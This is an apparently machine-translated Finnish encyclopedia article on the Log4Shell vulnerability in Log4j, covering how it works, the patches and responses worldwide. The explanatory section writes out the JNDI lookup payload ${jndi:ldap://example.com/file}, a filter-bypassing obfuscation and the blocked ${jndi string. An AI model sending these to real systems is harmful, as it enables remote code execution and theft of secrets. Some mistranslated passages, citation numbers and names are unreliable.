Log4Shell ( CVE-2021-44228 ) on nollapäivän haavoittuvuus Log4j:ssä , suositussa Java-lokikehyksessä, joka sisältää mielivaltaisen koodin suorittamisen. [1] [2] Haavoittuvuuden – sen olemassaoloa ei ole nähty vuoden 2013 jälkeen – julkisti yksityisesti Apache Software Foundation , jonka projekti Log4j on, Chen Zhaojun Alibaba Cloud -tietoturvatiimistä 24. marraskuuta 2021 ja julkisesti. julkistettu 9.12.2021. [3] [4] [5] [6] Apache antoi Log4Shellille CVSS:n vakavuuspisteen 10, korkeimman saatavilla olevan arvosanan. [7]Hyödyntämisen arvioidaan vaikuttavan satoihin miljooniin laitteisiin, ja se on erittäin helppokäyttöinen. [8] [9]
Haavoittuvuus hyödyntää sitä tosiasiaa, että Log4j sallii pyynnöt mielivaltaisille LDAP- ja JNDI -palvelimille vastausten vahvistamisen sijaan [1] [10] [11] , jolloin hyökkääjät voivat suorittaa mielivaltaisen Java-koodin palvelimella tai muulla koneella tai lähettää arkaluonteisia tietoja. [5] Apache Security Group on julkaissut luettelon ohjelmistoprojekteista, joihin tämä vaikuttaa. [12] Kaupallisiin palveluihin kuuluvat Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ ja monet muut. [10] [16] [17] Wizin ja EY :n mukaan haavoittuvuus vaikutti 93 %:iin yritysten pilviympäristöistä. [kahdeksantoista]
Asiantuntijat kuvasivat Log4Shellin kaikkien aikojen suurimmaksi haavoittuvuudeksi; [19] LunaSec kuvaili sitä "katastrofaalisten mittasuhteiden suunnitteluvirheeksi", [5] Tenable sanoi, että hyväksikäyttö oli "historian suurin ja kriittisin haavoittuvuus", [20] Ars Technica kutsui sitä "epäilemättä vakavimmaksi haavoittuvuudeksi koskaan". . [21] ja The Washington Post sanoivat, että turvallisuusasiantuntijoiden kuvaukset "rajoittuvat apokalypsiin". [19]
Log4j on avoimen lähdekoodin lokikirjasto , jonka avulla ohjelmistokehittäjät voivat kirjata tietoja sovelluksissaan. Nämä tiedot voivat sisältää käyttäjän syötteitä. [22] Se on kaikkialla Java-sovelluksissa, erityisesti yritysohjelmistoissa. [5] Sen kirjoitti alun perin Cheki Gulcu vuonna 2001, mutta se on nyt osa Apache Logging Services -projektia, Apache Software Foundationin projektia . [23] Presidentti Barack Obaman kyberturvallisuuskomission entinen jäsen Tom Kellermann kuvaili Apachea "yhdeksi sillan jättimäisistä pilareista, joka helpottaa sidekudosta sovellusmaailmojen ja laskentaympäristön välillä." [24]
Java - nimeämis- ja hakemistoliittymän (JNDI) avulla voit etsiä Java-objekteja ajon aikana niiden tietojen polun perusteella. JNDI voi käyttää useita hakemistorajapintoja, joista jokainen tarjoaa erilaisen tiedostohakumallin. Näihin liitäntöihin kuuluu LDAP ( Lightweight Directory Access Protocol ), ei-Java-protokolla [25] , joka hakee objektidataa URL-osoitteen muodossa sopivalta palvelimelta, paikalliselta tai muulta Internetissä. [26]
Oletuskokoonpanossa, kun merkkijono kirjataan lokiin, Log4j 2 suorittaa merkkijonojen korvaamisen muodon lausekkeissa ${prefix:name}. [26] Voit esimerkiksi Text: ${java:version}muuntaa muotoon Text: Java version 1.7.0_67. [27] Tunnistettujen ilmaisujen joukossa ovat ${jndi:<lookup>} ; määrittämällä haun LDAP:n kautta, mielivaltainen URL voidaan kysyä ja ladata Java-objektitietona. ${jndi:ldap://example.com/file}lataa tiedot tästä URL-osoitteesta, kun se on yhteydessä Internetiin. Kirjoittamalla lokiin kirjatun merkkijonon hyökkääjä voi ladata ja suorittaa julkisessa URL-osoitteessa isännöidyn haitallisen koodin. [26] Vaikka tietojen suoritus olisi estetty, hyökkääjä voi hankkia tietoja, kuten salaisia ympäristömuuttujia, sijoittamalla ne URL-osoitteeseen, jossa ne korvataan ja lähetetään hyökkääjän palvelimelle. [28] [29] LDAP:n lisäksi muita mahdollisesti hyödyllisiä JNDI-hakuprotokollia ovat sen suojattu muunnelma LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) ja Internet Inter-ORB Protocol (IIOP). [30] [31]
Koska HTTP -pyynnöt kirjataan usein lokiin, yleinen hyökkäysvektori on haitallisen merkkijonon sijoittaminen HTTP-pyynnön URL-osoitteeseen tai usein kirjattavaan HTTP-otsikkoon , kuten User-Agent. Varhaisiin suojauksiin kuului kaikkien mahdollisesti haitallista sisältöä sisältävien pyyntöjen estäminen, kuten ${jndi. [32] Naiivi haku voidaan ohittaa hämärtämällä kysely: esimerkiksi ${${lower:j}ndise muunnetaan JNDI-hauksi, kun kirjaimelle on suoritettu merkkijonotoiminto j. [33] Vaikka syötettä, kuten nimeä, ei heti kirjata lokiin, se voidaan myöhemmin tallentaa sisäisen käsittelyn aikana ja sen sisältö voidaan suorittaa. [26]
Tämän haavoittuvuuden korjaukset julkaistiin 6. joulukuuta 2021, kolme päivää ennen haavoittuvuuden julkaisemista, Log4j:n versiossa 2.15.0-rc1. [34] [35] [36] Korjaus sisälsi hauissa käytettävien palvelimien ja protokollien rajoittamisen. Tutkijat löysivät asiaan liittyvän virheen CVE-2021-45046, joka sallii paikallisen tai etäkoodin suorittamisen tietyissä ei-oletuskokoonpanoissa, ja se korjattiin versiossa 2.16.0, joka poisti käytöstä kaikki JNDI:tä ja viestien hakutukea käyttävät ominaisuudet. [37] [38] Aiemmissa versioissa luokka org.apache.logging.log4j.core.lookup. JndiLookupon poistettava luokkapolulta molempien haavoittuvuuksien vähentämiseksi. [7] [37] Aiemmin suositeltu korjaus vanhemmille versioille oli asettaa järjestelmän ominaisuuden log4j2.formatMsgNoLookups truearvoksi , mutta tämä muutos ei estä CVE-2021-45046:n käyttöä. [37]
Java Runtime Environmentin (JRE) uudemmat versiot myös vähentävät tätä haavoittuvuutta estämällä oletusarvoisesti koodin etälatauksen, vaikka joissakin sovelluksissa on edelleen muita hyökkäysvektoreita. [1] [28] [39] [40] On julkaistu useita menetelmiä ja työkaluja, jotka auttavat havaitsemaan log4j:n haavoittuvien versioiden käytön sulautetuissa Java-paketeissa. [41]
Hyökkäys antaa hakkereille mahdollisuuden ottaa haavoittuvia laitteita hallintaansa Javalla . [8] Jotkut hakkerit käyttävät haavoittuvuutta hyödyntääkseen uhrien laitteita; mukaan lukien kryptovaluutan louhinta , bottiverkkojen luominen , roskapostin lähettäminen, takaovien luominen ja muu laiton toiminta, kuten kiristysohjelmahyökkäykset. [8] [19] [42] Haavoittuvuuden julkaisua seuraavina päivinä Check Point seurasi miljoonia hakkereiden käynnistämiä hyökkäyksiä, ja jotkut tutkijat havaitsivat yli sata hyökkäystä minuutissa, mikä johti lopulta yli 40 prosenttiin hyökkäyksistä. kansainvälisten hyökkäysten kohteena olevat yritysverkot. [8] [24]
Cloudflaren toimitusjohtajan Matthew Princen mukaan todisteita hyväksikäytöstä tai testauksesta ilmaantui jo 1. joulukuuta, yhdeksän päivää ennen kuin se julkistettiin. [43] Kyberturvallisuusyrityksen GreyNoisen mukaan verkkosivustot ovat kaavineet useita IP - osoitteita etsiäkseen haavoittuvuuden sisältäviä palvelimia. [44] Useat bottiverkot aloittivat haavoittuvuuden etsimisen, mukaan lukien Muhstik-botnet 10. joulukuuta mennessä sekä Mirai , Tsunami ja XMRig. [8] [43] [45] Contin nähtiin hyödyntävän haavoittuvuutta 17. joulukuuta. [19]
Check Pointin mukaan myös jotkut valtion tukemat ryhmät Kiinassa ja Iranissa käyttivät hyväksikäyttöä, vaikka ei tiedetä, käyttikö hyväksikäyttö Israel, Venäjä vai Yhdysvallat ennen haavoittuvuuden paljastamista. [19] [46] Check Point totesi, että 15. joulukuuta 2021 Iranin tukemat hakkerit yrittivät soluttautua israelilaisiin yrityksiin ja hallituksen verkostoihin. [19]
Yhdysvalloissa Cybersecurity and Infrastructure Security Agencyn (CISA) johtaja Jen Easterly kuvaili hyväksikäyttöä "yhdeksi vakavimmista, ellei vakavimmista, mitä olen nähnyt koko urani aikana", ja selitti, että se vaikutti satoihin miljooniin laitteisiin. ja suositteli, että myyjät maksavat etusijalle ohjelmistopäivitykset. [8] [47] [48] Yhdysvaltain hallituksen palkkaamilla siviilivirastoilla oli 24. joulukuuta 2021 asti aikaa korjata haavoittuvuudet, vaikka siihen mennessä se olisi mahdollistanut pääsyn satoihin tuhansiin kohteisiin. [19]
Canadian Center for Cyber Security (CCCS) kehotti organisaatioita ryhtymään välittömiin toimiin. [49] Kanadan verovirasto poisti tilapäisesti verkkopalvelunsa käytöstä saatuaan tiedon hyväksikäytöstä, kun taas Quebecin hallitus sulki lähes 4 000 verkkosivustoaan "ennaltaehkäisevänä toimenpiteenä". [viisikymmentä]
Saksan liittovaltion turvallisuusvirasto ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) on tunnistanut hyväksikäytön olevan korkeimmalla uhkatasolla ja kutsunut sitä "erittäin kriittiseksi vaaralliseksi tilanteeksi" (käännetty). Hän sanoi myös, että useat hyökkäykset ovat jo onnistuneet ja haavoittuvuuden laajuutta on edelleen vaikea arvioida. [51] [52] Hollannin kansallinen kyberturvallisuuskeskus (NCSC) on aloittanut pysyvän luettelon haavoittuvista sovelluksista. [53] [54]
Kiinan teollisuus- ja tietotekniikkaministeriö on keskeyttänyt Alibaba Cloudin kyberturvallisuusuhkien analysointikumppanin kuuden kuukauden ajaksi, koska se ei ole ilmoittanut haavoittuvuudesta ensin hallitukselle. [55]
Wizin ja EY :n tutkimuksessa [18] havaittiin, että 93 % pilviyritysympäristöstä oli haavoittuvainen Log4Shellille. 7 % haavoittuvista työkuormista on saatavilla verkossa, ja niitä yritetään hyödyntää laajasti. Tutkimuksen mukaan kymmenen päivää haavoittuvuuden julkaisemisen jälkeen (20.12.2021) vain 45 % haavoittuvista työkuormista korjattiin pilviympäristöissä. Log4Shell on vaikuttanut Amazonin, Googlen ja Microsoftin pilvitietoihin. [19]
HR- ja HR-yritys UKG, yksi alan suurimmista yrityksistä, on kärsinyt suuriin yrityksiin kohdistuvasta kiristysohjelmahyökkäyksestä . [21] [56] UKG ilmoitti, ettei sillä ollut todisteita Log4Shellin käyttämisestä tapahtumassa, vaikka kyberturvallisuusyhtiö Recorded Future -nalyytikko Allan Liska sanoi, että yhteys saattaa olla olemassa. [57]
Kun suuret yritykset alkoivat julkaista korjaustiedostoja hyväksikäyttöä varten, riski pienille yrityksille kasvoi, kun hakkerit keskittyivät haavoittuvampiin kohteisiin. [42]
Henkilökohtaiset laitteet, kuten älytelevisiot ja Internetiin kytketyt valvontakamerat, olivat alttiina hyväksikäytölle. [19]
14.12.2021 mennessä lähes puolet maailman kaikista yritysverkoista oli aktiivisesti tutkittu ja päivässä luotiin yli 60 hyödyntämisvarianttia. [58] Check Point Software Technologies kuvaili yksityiskohtaisessa analyysissä tilannetta "todelliseksi kyberpandemiaksi" ja kuvaili mahdollisia vahinkoja "arvaamattomiksi". [59] Useat alkuperäiset suositukset yliarvioivat haavoittuvien pakettien määrän, mikä johti vääriin positiivisiin tuloksiin. Erityisesti "log4j api" -paketti merkittiin haavoittuvaiseksi, kun taas itse asiassa lisätutkimukset osoittivat, että vain pääpaketti "log4j-core" oli haavoittuvainen.
Tämä on vahvistettu sekä alkuperäisessä julkaisuhaarassa [60] että ulkopuolisten tietoturvatutkijoiden toimesta.
Teknologialehti Wired kirjoitti, että huolimatta aiemmasta "hype'stä", joka ympäröi lukuisia haavoittuvuuksia, "Log4j-haavoittuvuutta ympäröivä hype... on perusteltua useista syistä." [46] Lehti selittää, että log4j:n yleisyys, jonka haavoittuvuutta mahdollisten kohteiden on vaikea havaita, ja helppous, jolla koodi voidaan siirtää uhrin koneelle, loi "vakavuuden, saavutettavuuden ja yleisyyden yhdistelmän, joka järkytti tietoturva-ammattilaisia. ." [46] Wired esitteli myös kaavamaisesti hakkereiden Log4Shellin käytön: kryptovaluuttojen louhintaryhmät hyödyntävät haavoittuvuutta ensimmäisenä, sitten datakauppiaat myyvät "sillanpään" kyberrikollisille, jotka vihdoin ryhtyvät kiristykseen, vakoiluun ja tietojen tuhoamiseen . . [46]
Amit Göran, Tenablen toimitusjohtaja ja US Computer Emergency Preparedness Groupin perustajajohtaja , totesi, että "[Log4Shell] on ylivoimaisesti suurin ja kriittisin haavoittuvuus historiassa", huomautti, että kehittyneet hyökkäykset alkoivat pian virheen jälkeen, ja totesi: "Me myös on jo nähty, että sitä käytetään kiristysohjelmahyökkäyksiin, minkä pitäisi jälleen olla suuri herätys... Olemme myös nähneet raportteja hyökkääjistä, jotka käyttävät Log4Shellia tuhotakseen järjestelmiä edes yrittämättä saada lunnaita - melko epätavallista käytöstä." . [46] Sophosin vanhempi uhkatutkija Sean Gallagher sanoi: "Ollakseni rehellinen, suurin uhka tässä on se, että ihmiset ovat jo saaneet pääsyn ja käyttävät sitä vain, ja vaikka korjaatkin ongelman, joku on jo verkossa... olemassa niin kauan kuin Internet." [kaksikymmentä]
| 2020-luvun hakkerihyökkäykset | |
|---|---|
| Suurimmat hyökkäykset | |
| Hakkereiden ryhmät ja yhteisöt |
|
| Havaittiin kriittisiä haavoittuvuuksia |
|
| Tietokonevirukset | |
| 2000 -luku • 2010 -luku • 2020-luku | |